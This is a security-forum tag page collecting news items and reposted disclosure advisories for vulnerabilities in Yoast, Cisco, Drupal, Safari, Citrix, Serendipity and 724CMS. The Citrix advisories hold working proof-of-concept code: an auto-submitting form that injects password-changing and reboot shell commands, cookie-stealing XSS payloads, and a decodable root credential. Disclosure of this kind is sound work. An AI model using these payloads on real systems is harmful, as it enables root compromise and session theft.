Jump to content

Search the Community

Showing results for tags 'vulnerability'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

  1. Yoast has released a new version of its popular Google Analytics plugin for WordPress to address a persistent cross-site scripting (XSS) vulnerability that could have been exploited to execute arbitrary code. Google Analytics by Yoast has been downloaded nearly 7 million times. The application allows WordPress administrators to monitor website traffic by connecting the plugin to their Google Analytics account. The vulnerability was identified by Jouko Pynnonen, the CEO of Finland-based IT company Klikki Oy. Earlier this month, the expert reported identifying several vulnerabilities in the WPML premium WordPress plugin. According to the researcher, an attacker can leverage a flaw in Google Analytics by Yoast to store arbitrary code in a targeted administrator’s WordPress dashboard. The code is executed as soon as the administrator opens the plugin’s settings panel. The attack involves two security bugs. First, there is an access control flaw that allows an unauthenticated attacker to connect the plugin installed on the targeted website to his own Google Analytics account by overwriting existing OAuth2 credentials. The second stage of the attack relies on the fact that the plugin renders an HTML dropdown menu based on data from Google Analytics. Because this data is not sanitized, an attacker can enter malicious code in the Google Analytics account and it gets executed when the targeted administrator views the plugin’s settings panel. “Under default WordPress configuration, a malicious user can exploit this flaw to execute arbitrary server-side PHP code via the plugin or theme editors,” Pynnonen said in an advisory. “Alternatively the attacker could change the administrator’s password, create new administrator accounts, or do whatever else the currently logged-in administrator can do on the target site.” The security issues have been addressed with the release of Google Analytics by Yoast version 5.3.3. The update also fixes a flaw that allowed administrators to launch XSS attacks against other administrators. This vulnerability was publicly disclosed back in February by Kaustubh G. Padwad and Rohit Kumar. This isn’t the first time someone finds a vulnerability in a plugin from Yoast. Last week, UK-based researcher Ryan Dewhurst uncovered a blind SQL injection vulnerability in WordPress SEO by Yoast. Sursa: securityweek.com
  2. Some of the IP phones designed by Cisco for small businesses are plagued by a vulnerability that allows a remote attacker to eavesdrop on conversations and make phone calls from affected devices, the company revealed last week. The unauthenticated remote dial vulnerability (CVE-2015-0670) affects version 7.5.5 and possibly later versions of Cisco Small Business SPA300 and SPA500 series IP phones.Cisco IP phones According to an advisory published by Cisco, the flaw is caused by improper authentication settings in the affected software’s default configuration. A remote, unauthenticated attacker can exploit the weakness by sending a maliciously crafted XML request to the targeted IP phone. Malicious actors could obtain sensitive information by listening in on audio streams from the device. They can also leverage the bug to make phone calls remotely from a vulnerable phone. “A successful exploit could be used to conduct further attacks,” Cisco said. “To exploit this vulnerability, an attacker may need access to trusted, internal networks behind a firewall to send crafted XML requests to the targeted device. This access requirement may reduce the likelihood of a successful exploit,” the company noted in its advisory. Cisco has confirmed the security hole, but updates that address this issue are not yet available. The company believes it’s unlikely for this medium severity vulnerability to be exploited. Until security updates become available, administrators are advised to enable XML execution authentication from the device’s settings menu, and limit network access to trusted users. The security hole was discovered by Chris Watts of Tech Analysis. In July 2014, the researcher reported two other flaws impacting Cisco SPA300 and SPA500 series IP phones: a cross-site scripting (XSS) vulnerability (CVE-2014-3313), and a vulnerability that can be exploited by a local attacker to execute arbitrary commands (CVE-2014-3312). At around the same time, Watts also identified a remote code execution flaw in Cisco modems. Earlier this month, Cisco announced the availability of security updates that fix vulnerabilities in Cisco Intrusion Prevention System (IPS), TelePresence Video Communication Server (VCS), Expressway, and TelePresence Conductor. Sursa
  3. Drupal, one of the widely used open source content management system is recommending its users to update their software to the latest versions 6.35 and 7.35 after the company discovered two moderately critical vulnerabilities that may allow an attacker to hack Drupal websites. According to a security advisory published yesterday, a flaw found in the Drupal core could allow a potential hacker under certain circumstances to bypass security restrictions by forging the password reset URLs. ACCESS BYPASS / PASSWORD RESET URLs VULNERABILITY Successful exploitation of this Access Bypass vulnerability could leverage the hacker to gain unauthorized access to user accounts without knowing their password. This vulnerability is considered as moderately critical in which an attacker can remotely trick a registered user of Drupal based website, such as an administrator, into launching a maliciously crafted URL in an attempt to take control of the target server. AFFECTED DRUPAL WEBSITES The exploitation of the access bypass vulnerability on Drupal 7 website is possible only if the account importing or programmatically editing process results in the password hash in the database being the same for multiple user accounts. The websites running Drupal 6 are at greater risk, because the administrators of the websites have created multiple new user accounts protected by the same password. Moreover, the security vulnerability can also be exploited in the Drupal 6 websites where accounts have been imported or programmatically edited in a way that results in the password hash field in the database being empty for at least for one user account. OPEN REDIRECT VULNERABILITY The affected versions of Drupal CMS are also susceptible to an open redirect vulnerability. Drupal action URLs contain a "destination" parameter in it, which can be used by cyber criminals to redirect users to a third-party location with malicious content. According to the Drupal team, there are multiple URL-related API functions in affected versions of Drupal 6 and 7 which can be used by attackers into passing through external URLs when not required. This could potentially lead to additional open redirect vulnerabilities. The issue is actually serious because Drupal is used to power over 1 billion websites on Internet, which puts Drupal in third place behind the Wordpress and Joomla. Drupal provides a Content management system for websites including MTV, Popular Science, Sony Music, Harvard and MIT. RECOMMENDATIONS Website administrators are strongly recommended to take some necessary steps: Update to the latest version of Drupal core, i.e. Drupal core 6.35 and Drupal core 7.35 Run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack. Do not click on links from unknown sources. Do not open email attachments from unknown or untrusted sources. Consider implementing file extension whitelists for allowed e-mail attachments. Source
  4. Apple on Tuesday pushed out new versions of its Safari browser that address 17 security vulnerabilities in the WebKit engine. Safari 8.04, 7.14 and 6.24 patch multiple memory corruption issues in WebKit, Apple said. “These issues were addressed through improved memory handling,” Apple said in its advisory. The advisory is sparse in other details on individual CVEs; Apple said that users visiting a website hosting an exploit could put the browser at risk to remote code execution or a crash. A separate WebKit vulnerability affects the user interface and could open the door to phishing attacks. “A user interface inconsistency existed in Safari that allowed an attacker to misrepresent the URL,” Apple said. “This issue was addressed through improved user interface consistency checks.” This is the second set of Apple patches in the last 10 days. The company took care of the FREAK vulnerability in iOS along with another vulnerability that would allow a hacker to remotely restart a user’s phone via a SMS message. Apple iOS 8.2 also patched a vulnerability in the iCloud keychain function that was the result of several buffer overflows. Source
  5. Citrix NITRO SDK Command Injection ------------------------------------------------------------------------ Command injection vulnerability in Citrix NITRO SDK xen_hotfix page ------------------------------------------------------------------------ Han Sahin, August 2014 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ Securify discovered a command injection vulnerability in xen_hotfix page of the NITRO SDK. The attacker-supplied command is executed with elevated privileges (nsroot). This issue can be used to compromise of the entire Citrix SDX appliance and all underling application's and data. ------------------------------------------------------------------------ Tested version ------------------------------------------------------------------------ This issue was discovered in Citrix NetScaler SDX svm-10.5-50-1.9, other versions may also be affected. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ Citrix reports that this vulnerability is fixed in NetScaler 10.5 build 52.3nc. ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://www.securify.nl/advisory/SFY20140806/command_injection_vulnerability_in_citrix_nitro_sdk_xen_hotfix_page.html This vulberability exists because the file_name parameter submitted to the /nitro/v1/config/xen_hotfix page used in a shell command without proper input validation/sanitation, introducing a command execution vulnerability. The shell command is executed with elevated privileges (nsroot), which allows attackers to run arbitrary commands with these privileges. This issue can be used to compromise of the entire Citrix SDX appliance and all underling application's and data. The following proof of concept can be used to exploit this issue; <html> <body> <form action="https://SDXHOSTIP/nitro/v1/config/xen_hotfix" method="POST"> <input type="hidden" name="object" value="{"params":{"action":"start"},"xen_hotfix":[{"file_name":"../../etc/passwd;echo nsroot:Securify|chpasswd;"}]}" /> <input type="submit" value="Submit request" /> </form> <script>document.forms[0].submit();</script> </body> </html> POST /nitro/v1/config/xen_hotfix HTTP/1.1 ----------------------------------------- object={"params"%3a{"action"%3a"start"}%2c"xen_hotfix"%3a[{"file_name"../../etc/passwd;reboot;"}]} or object={"params"%3a{"action"%3a"start"}%2c"xen_hotfix"%3a[{"file_name"%3a"../../etc/passwd;echo nsroot:han|chpasswd;"}]} Due to insufficient Cross-Site Request Forgery protection, it is possible to exploit this issue by tricking a logged in admin user into visiting a specially crafted web page. Citrx Command Center Advent JMX Servlet Accessible ------------------------------------------------------------------------ Advent JMX Servlet of Citrx Command Center is accessible to unauthenticated users ------------------------------------------------------------------------ Han Sahin, August 2014 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ It was discovered that the Advent JMX Servlet of Citrix Command Center is accessible to unauthenticated users. This issue can be abused by attackers to comprise the entire application. ------------------------------------------------------------------------ Tested version ------------------------------------------------------------------------ This issue was discovered in Citrix Command Center 5.1 build 33.3 (including patch CC_SP_5.2_40_1.exe), other versions may also be vulnerable. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ Citrix reports that this vulnerability is fixed in Command Center 5.2 build 42.7, which can be downloaded from the following location (login required). https://www.citrix.com/downloads/command-center/product-software/command-center-52-427.html Citrix assigned BUG0494204 to this issue. ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://www.securify.nl/advisory/SFY20140804/advent_jmx_servlet_of_citrx_command_center_is_accessible_to_unauthenticated_users.html The Advent JMX Servlet is exposed at /servlets/Jmx_dynamic. Functionality exposed by the JMX Servlet can be invoked by an unauthenticated attacker, which can lead to unauthorized remote code execution and comprise of the entire application and services. In addition, this interface is also affected by Cross-Site Scripting. For example: https://<target>:8443/servlets/Jmx_dynamic?fname=<script>alert(document.cookie);</script> Citrix NetScaler VPX Cross Site Scripting ------------------------------------------------------------------------ Citrix NetScaler VPX help pages are vulnerable to Cross-Site Scripting ------------------------------------------------------------------------ Han Sahin, August 2014 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ It was discovered that the help pages of Citrix VPX are vulnerable to Cross-Site Scripting. This issue allows attackers to perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. ------------------------------------------------------------------------ Tested version ------------------------------------------------------------------------ This issue was discovered in Citrix NetScaler VPX NSVPX-ESX-10.5-50.10, other versions may also be vulnerable. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ Citrix reports that this vulnerability is fixed in NetScaler 10.5 build 52.8nc. ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://www.securify.nl/advisory/SFY20140807/citrix_netscaler_vpx_help_pages_are_vulnerable_to_cross_site_scripting.html This issue exists because the value of the searchQuery URL parameter is assigned client-side to contentDiv.innerHTML (DOM-based Cross-Site Scripting), for example: https://<target>/help/rt/large_search.html?searchQuery=<h1>Reset your password below:<h1><iframe src='http://www.evil.com'/>&type=ctxTV Tricking a victim into visiting a specially crafted URL allows attackers to run arbitrary client-side scripting code within the victim's browser. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Citrix NITRO SDK xen_hotfix Cross Site Scripting ------------------------------------------------------------------------ Citrix NITRO SDK xen_hotfix page is vulnerable to Cross-Site Scripting ------------------------------------------------------------------------ Han Sahin, August 2014 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ A Cross-Site Scripting vulnerability was found in the xen_hotfix page of the Citrix NITRO SDK. This issue allows attackers to perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. ------------------------------------------------------------------------ Tested version ------------------------------------------------------------------------ This issue was discovered in Citrix NetScaler SDX svm-10.5-50-1.9;, other versions may also be affected. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ Citrix reports that this vulnerability is fixed in NetScaler 10.5 build 52.3nc. ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://www.securify.nl/advisory/SFY20140805/citrix_nitro_sdk_xen_hotfix_page_is_vulnerable_to_cross_site_scripting.html The Cross-Site Scripting vulnerability exists because the REST interface returns an incorrect Content-Type HTTP response header. The interfaces states that the content returned is HTML, while in fact it is JSON. Due to this it is possible to cause browser to render the JSON response as HTML. User input included in the JSON response is JSON encoded, not HTML encoded. Due to this, it is possible to inject arbitrary HTML content in the JSON data that will be rendered and executed by the browser. This issue is exploitable on the /nitro/v1/config/xen_hotfix page through the file_name parameter. Below is an example HTTP response in which this issue is demonstrated. HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Date: Wed, 16 Jul 2014 13:54:53 GMT { "errorcode": 16004, "message": "Failed to obtain uuid for hotfix cmd.xsupdate<img src=a onerror=alert(document.cookie)>, error string = 'xe patch-upload file-name=\"\/root\/cmd.xsupdate<img src=a onerror=alert(document.cookie)>\"\r\nOperation failed. Error: file '\/root\/cmd.xsupdate<img src=a onerror=alert(document.cookie)>' does not exist\r\n\u001b]0;root@NetScaler-sdx:~\u0007[root@NetScaler-sdx ~]#'", "severity": "ERROR" } Proof of concept: <html> <body> <form id="form" method="POST" action="https://<target>/nitro/v1/config/xen_hotfix" enctype="text/plain"> <input type="hidden" name="object" value='{"params"%3a{"action"%3a"start"}%2c"xen_hotfix"%3a [{"file_name"%3a" cmd.xsupdate<img%20src%3da%20onerror%3dalert(document.cookie)>"}]}' /> <input type="submit" value="submit"> </form> <script> document.forms[0].submit(); </script> </body> </html> Citrix Command Center Configuration Disclosure ------------------------------------------------------------------------ Citrix Command Center allows downloading of configuration files ------------------------------------------------------------------------ Han Sahin, August 2014 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ It was discovered that Citrix Command Center stores configuration files containing credentials of managed devices within a folder accessible through the web server. Unauthenticated attackers can download any configuration file stored in this folder, decode passwords stored in these files, and gain privileged access to devices managed by Command Center. ------------------------------------------------------------------------ Tested version ------------------------------------------------------------------------ This issue was discovered in Citrix Command Center 5.1 build 33.3 (including patch CC_SP_5.2_40_1.exe), other versions may also be vulnerable. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ Citrix reports that this vulnerability is fixed in Command Center 5.2 build 42.7, which can be downloaded from the following location (login required). https://www.citrix.com/downloads/command-center/product-software/command-center-52-427.html Citrix assigned BUG0493933 to this issue. ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://www.securify.nl/advisory/SFY20140802/citrix_command_center_allows_downloading_of_configuration_files.html Configuration files can be downloaded from the conf web folder. Below is an example of a configuration file that can be obtained this way. https://<target>:8443/conf/securitydbData.xml This files contains encoded passwords, for example: <DATA ownername="NULL" password="C70A0eE9os9T2z" username="root"/> These passwords can be decoded trivially. The algorithm used can be found in the JAR file NmsServerClasses.jar. For example the encoded password C70A0eE9os9T2z decodes to SECURIFY123. The credentials stored in these files can than be used to gain privileged access to devices managed by Command Center.
  6. ########################### #Exploit Title: # Script Cisco Network Academy - Stored XSS vulnerability #Date: 017/03/2015 #Author: kabanni bntdzdz@gmail.com #Product web page: www.cisco.com #Tested on: Windows 8.1 #OSVDB-ID: ########################### 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 1 ______ 0 0 .-" "-. 1 1 / HaChkerz_Dz \ =-=-=-=-=-=-=-=-=-=-=-=| 0 0 Algerian HaCker | | > Site : GDGBordj.org | 1 1 --------------- |, .-. .-. ,| > fb : @kabanni | 0 0 | )(_o/ \o_)( | > [email]kacily2008@gmail.com[/email]| 1 1 |/ /\ \| =-=-=-=-=-=-=-=-=-=-=-| 0 0 (@_ (_ ^^ _) 0X00 Team 1 1 _ ) \_______\__|IIIIII|__/_______________________ 0 0 (_)@8@8{}<________|-\IIIIII/-|________________________> 1 1 )_/ \ / 0 0 (@ `--------` 2015, 0x00 Team 1 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0 0 Script Cisco Network Academy XSS vulnerability 1 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0 ########################## Description A vulnerability in the web framework of Cisco Netacad could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web interface on the affected system. The vulnerability is due to insufficient input validation of several parameters in the input fields Quarantine web page. An attacker could exploit this vulnerability by persuading a user to access a malicious link. # Sample Payload for Stored XSS: "<script>alert(0);</script> " # Solution Fix & Patch: Filter the input fields aganist to XSS attacks & Upgrade the the script. #Security Risk: The risk of the vulnerabilities above estimated as high. #Proof of Concept (PoC): <input type="TEXT" maxlength="250" size="50" name="ANSWERrt_239101" disabled=""> #Details of the attack: The web site netacd.com , is allowed to the users pass the exams of CCNA . The questions compose in many format like Check box , Radio , and Input field . When enter the code malicious to a question witch content an input field , finally if submit the answers ,and when go to show the assessment , the user appear a message java script . --==[[ Greetz To ]]==-- ############################################################################################ #0x00 , Alhack , Mr.elhdj Google , Hakim_Ghorb , Mohamed Ramaden , Team Anonymous . #Mr.Zaki ,Dr.Ben Taleb,Nas_unknown ,Dahmani,Good_person ,Boud_Sah ,Moh_Dz ,Yass_assasine. #Amin-Biskra , Bouhlel ,Meliani, Najmo & All students TIC & Informatics at Univ-Msila ############################################################################################# --==[[Love to]]==-- # My Father & Mother ,All Kacem(bira9i9) ,my Ex Teacher , My wife . --==[[ All Muslims Hachers ]]==-- <3 0x00 Team <3 Source
  7. Serendipity CMS - XSS Vulnerability in Version 2.0 ---------------------------------------------------------------- Product Information: Software: Serendipity CMS Tested Version: 2.0, released 23.1.2015 Vulnerability Type: Cross-Site Scripting (CWE-79) Download link: http://www.s9y.org/12.html Description: Serendipity is aimed to make everything possible you ever wish for. It is technically up to par to other well-known weblog scripts like Moveable Type or Wordpress. (copied from http://www.s9y.org/3.html) ---------------------------------------------------------------- Vulnerability description: XSS is found in category creation page. When an authenticated user of Serendipity CMS is creating a new category, the following POST request is sent to the server: POST /serendipity-2.0/serendipity/serendipity_admin.php?serendipity[adminModule]=category&serendipity[adminAction]=new HTTP/1.1 Host: 127.0.0.1 Proxy-Connection: keep-alive Content-Length: 394 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.76 Safari/537.36 Content-Type: application/x-www-form-urlencoded Referer: http://127.0.0.1/serendipity-2.0/serendipity/serendipity_admin.php?serendipity[adminModule]=category&serendipity[adminAction]=new Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8 Cookie: serendipity[old_session]=q8jagkbn03i41p1hea1vp3mqi7; serendipity[author_token]=906de2dd7201b75f1f710f59128e1ffb5cec6cf4; serendipity[userDefLang]=en; serendipity[toggle_extended]=true; serendipity[addmedia_directory]=undefined; serendipity[sortorder_perpage] serendipity[sortorder_order] serendipity[sortorder_ordermode] serendipity[only_path] serendipity[only_filename] serendipity[entrylist_filter_author] serendipity[entrylist_filter_category] serendipity[entrylist_filter_isdraft] serendipity[entrylist_sort_perPage] serendipity[entrylist_sort_ordermode] serendipity[entrylist_sort_order] s9y_f857b4bc988a333c379a2d9bd477dd65=q8jagkbn03i41p1hea1vp3mqi7 serendipity%5Btoken%5D=b95339bd8490707038719715c6d58e63&serendipity%5Bcat%5D%5Bname%5D=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&serendipity%5Bcat%5D%5Bdescription%5D=&serendipity%5Bcat%5D%5Bparent_cat%5D=0&serendipity%5Bcat%5D%5Bhide_sub%5D=0&serendipity%5Bcat%5D%5Bread_authors%5D%5B%5D=0&serendipity%5Bcat%5D%5Bwrite_authors%5D%5B%5D=0&serendipity%5Bcat%5D%5Bicon%5D=&SAVE=Create The parameter serendipity[cat][name] is vulnerable to XSS. The payload is executed when an authenticated user navigates to the "New Entry" page. ---------------------------------------------------------------- Impact: An attacker is able to leverage on the XSS vulnerability to exploit content creator of Serendipity CMS. An example would be to inject malicious JavaScript code in order to use attacking tools like BeEF. ---------------------------------------------------------------- Solution: Update to the latest version, which is 2.0.1, see http://blog.s9y.org/archives/263-Serendipity-2.0.1-released.html ---------------------------------------------------------------- Timeline: Vulnerability found: 12.3.2015 Vendor informed: 12.3.2015 Response by vendor: 12.3.2015 Fix by vendor 12.3.2015 Public Advisory: 13.3.2015 ---------------------------------------------------------------- Reference: https://github.com/s9y/Serendipity/commit/a30886d3bb9d8eeb6698948864c77caaa982435d ---------------------------------------------------------------- Best regards, Edric Teo Source
  8. 724CMS 5.01 / 4.59 / 4.01 / 3.01 Information Leakage *724CMS 5.01 Multiple Information Leakage Security Vulnerabilities* Exploit Title: 724CMS Multiple Information Leakage Security Vulnerabilities Vendor: 724CMS Product: 724CMS Vulnerable Versions: 3.01 4.01 4.59 5.01 Tested Version: 5.01 Advisory Publication: March 14, 2015 Latest Update: March 14, 2015 Vulnerability Type: Information Exposure [CWE-200] CVE Reference: * Impact CVSS Severity (version 2.0): CVSS v2 Base Score: 5.0 (MEDIUM) (AV:N/AC:L/Au:N/C:P/I:N/A:N) (legend) Impact Subscore: 2.9 Exploitability Subscore: 10.0 Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU), Singapore] *Suggestion Details:* *(1) Vendor & Product Description:* *Vendor:* 724CMS Enterprise *Product & Vulnerable Versions:* 724CMS 3.01 4.01 4.59 5.01 *Vendor URL & download:* 724CMS can be got from here, http://724cms.com/ *Product Introduction Overview:* 724CMS is a content management system (CMS) that has large customers spread in Canada, Japan, Korean, the United States and many others. It allows publishing, editing and modifying content, organizing, deleting as well as maintenance from a central interface. Meanwhile, 724CMS provides procedures to manage workflow in a collaborative environment. *(2) Vulnerability Details:* 724CMS web application has a security bug problem. It can be exploited by information leakage attacks - Full Path Disclosure (FPD). This may allow a remote attacker to disclose the software's installation path. While such information is relatively low risk, it is often useful in carrying out additional, more focused attacks. Several 724CMS products vulnerabilities have been found by some other bug hunter researchers before. 724CMS has patched some of them. NVD is the U.S. government repository of standards based vulnerability management data (This data enables automation of vulnerability management, security measurement, and compliance (e.g. FISMA)). It has published suggestions, advisories, solutions related to 724CMS vulnerabilities. *(2.1)* The first code programming flaw occurs at "index.php" page with "&Lang", "&ID" parameters. *(2.2)* The second code programming flaw occurs at "section.php" page with "&Lang", "&ID" parameters. *References:* http://tetraph.com/security/information-leakage-vulnerability/724cms-5-01-information-leakage-security-vulnerabilities/ http://securityrelated.blogspot.com/2015/03/724cms-501-information-leakage-security.html http://www.inzeed.com/kaleidoscope/computer-web-security/724cms-5-01-information-leakage-security-vulnerabilities/ http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/724cms-5-01-information-leakage-security-vulnerabilities/ https://infoswift.wordpress.com/2015/03/14/724cms-5-01-information-leakage-security-vulnerabilities/ http://marc.info/?l=full-disclosure&m=142576280203098&w=4 http://en.hackdig.com/wap/?id=17055 -- Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. http://www.tetraph.com/wangjing/ https://twitter.com/tetraphibious 724CMS 5.01 / 4.59 / 4.01 / 3.01 Directory Traversal *724CMS 5.01 Directory (Path) Traversal Security Vulnerabilities* Exploit Title: 724CMS /section.php Module Parameter Directory Traversal Security Vulnerabilities Vendor: 724CMS Product: 724CMS Vulnerable Versions: 3.01 4.01 4.59 5.01 Tested Version: 5.01 Advisory Publication: March 14, 2015 Latest Update: March 14, 2015 Vulnerability Type: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') [CWE-22] CVE Reference: * Impact CVSS Severity (version 2.0): CVSS v2 Base Score: 7.5 (HIGH) (AV:N/AC:L/Au:N/C:P/I:P/A:P) (legend) Impact Subscore: 6.4 Exploitability Subscore: 10.0 Discover and Author: Wang Jing [CCRG, Nanyang Technological University (NTU), Singapore] *Recommendation Details:* *(1) Vendor & Product Description:* *Vendor:* 724CMS Enterprise *Product & Vulnerable Versions:* 724CMS 3.01 4.01 4.59 5.01 *Vendor URL & download:* 724CMS can be bargained from here, http://724cms.com/ *Product Introduction Overview:* "724CMS is a content management system (CMS) that has customers spread in Canada, Japan, Korean, the United States, European and many others. It allows publishing, editing and modifying content, organizing, deleting as well as maintenance from a central interface. Meanwhile, 724CMS provides procedures to manage workflow in a collaborative environment." "A CMS helps you create and store content in a shared repository. It then manages the relationships between content items for you (e.g. keeping track of where they fit into the site hierarchy). Finally, it ensures that each content item is connected to the right style sheet when it comes to be published. Some CMSs also provide facilities to track the status of content items through editorial processes and workflows." *(2) Vulnerability Details:* 724CMS web application has a security bug problem. It can be exploited by Directory Traversal - Local File Include (LFI) attacks. A local file inclusion (LFI) flaw is due to the script not properly sanitizing user input, specifically path traversal style attacks (e.g. '../../') supplied to the parameters. With a specially crafted request, a remote attacker can include arbitrary files from the targeted host or from a remote host . This may allow disclosing file contents or executing files like PHP scripts. Such attacks are limited due to the script only calling files already on the target host. Several 724CMS products vulnerabilities have been found by some other bug hunter researchers before. 724CMS has patched some of them. The MITRE Corporation is a not-for-profit company that operates multiple federally funded research and development centers (FFRDCs), which provide innovative, practical solutions for some of our nation's most critical challenges in defense and intelligence, aviation, civil systems, homeland security, the judiciary, healthcare, and cybersecurity. It has published suggestions, advisories, solutions details related to 724CMS vulnerabilities. *(2.1) *The first cipher programming flaw occurs at "/section.php" page with "&Module" parameter. *References:* http://www.tetraph.com/security/directory-traversal-vulnerability/724cms-5-01-directory-path-traversal-security-vulnerabilities/ http://securityrelated.blogspot.com/2015/03/724cms-501-directory-path-traversal.html http://www.inzeed.com/kaleidoscope/computer-web-security/724cms-5-01-directory-path-traversal-security-vulnerabilities/ http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/724cms-5-01-directory-path-traversal-security-vulnerabilities/ https://computertechhut.wordpress.com/2015/03/14/724cms-5-01-directory-path-traversal-security-vulnerabilities/ http://marc.info/?a=139222176300014&r=1&w=4 http://en.hackdig.com/wap/?id=17404 -- Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. http://www.tetraph.com/wangjing/ https://twitter.com/justqdjing 724CMS 5.01 / 4.59 / 4.01 / 3.01 SQL Injection *724CMS 5.01 Multiple SQL Injection Security Vulnerabilities* Exploit Title: 724CMS Multiple SQL Injection Security Vulnerabilities Vendor: 724CMS Product: 724CMS Vulnerable Versions: 3.01 4.01 4.59 5.01 Tested Version: 5.01 Advisory Publication: March 14, 2015 Latest Update: March 14, 2015 Vulnerability Type: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') [CWE-89] CVE Reference: * Impact CVSS Severity (version 2.0): CVSS v2 Base Score: 7.5 (HIGH) (AV:N/AC:L/Au:N/C:P/I:P/A:P) (legend) Impact Subscore: 6.4 Exploitability Subscore: 10.0 Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU), Singapore] *Recommendation Details:* *(1) Vendor & Product Description:* *Vendor:* 724CMS Enterprise *Product & Vulnerable Versions:* 724CMS 3.01 4.01 4.59 5.01 *Vendor URL & download:* 724CMS can be gain from here, http://724cms.com/ *Product Introduction Overview:* "724CMS is a content management system (CMS) that has customers spread in Canada, Japan, Korean, the United States, European and many others. It allows publishing, editing and modifying content, organizing, deleting as well as maintenance from a central interface. Meanwhile, 724CMS provides procedures to manage workflow in a collaborative environment." "A CMS helps you create and store content in a shared repository. It then manages the relationships between content items for you (e.g. keeping track of where they fit into the site hierarchy). Finally, it ensures that each content item is connected to the right style sheet when it comes to be published. Some CMSs also provide facilities to track the status of content items through editorial processes and workflows." *(2) Vulnerability Details:* 724CMS web application has a security bug problem. It can be exploited by SQL Injection attacks. This may allow an attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data. Several 724CMS products vulnerabilities have been found by some other bug hunter researchers before. 724CMS has patched some of them. The MITRE Corporation is a not-for-profit company that operates multiple federally funded research and development centers (FFRDCs), which provide innovative, practical solutions for some of our nation's most critical challenges in defense and intelligence, aviation, civil systems, homeland security, the judiciary, healthcare, and cybersecurity. It has phase, votes, comments and proposed details related to 724CMS vulnerabilities. *(2.1)* The first cipher programming flaw occurs at "/index.php" page with "&Lang", "&ID" parameters. *(2.2) *The second cipher programming flaw occurs at "/section.php" page with "&Lang", "&ID" parameters. *References:* http://www.tetraph.com/security/sql-injection-vulnerability/724cms-5-01-multiple-sql-injection-security-vulnerabilities/ http://securityrelated.blogspot.com/2015/03/724cms-501-multiple-sql-injection.html http://www.inzeed.com/kaleidoscope/computer-web-security/724cms-5-01-multiple-sql-injection-security-vulnerabilities/ http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/724cms-5-01-multiple-sql-injection-security-vulnerabilities/ https://computertechhut.wordpress.com/2015/03/14/724cms-5-01-multiple-sql-injection-security-vulnerabilities/ https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01766.html http://marc.info/?a=139222176300014&r=1&w=4 http://en.1337day.com/exploit/23308 -- Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. 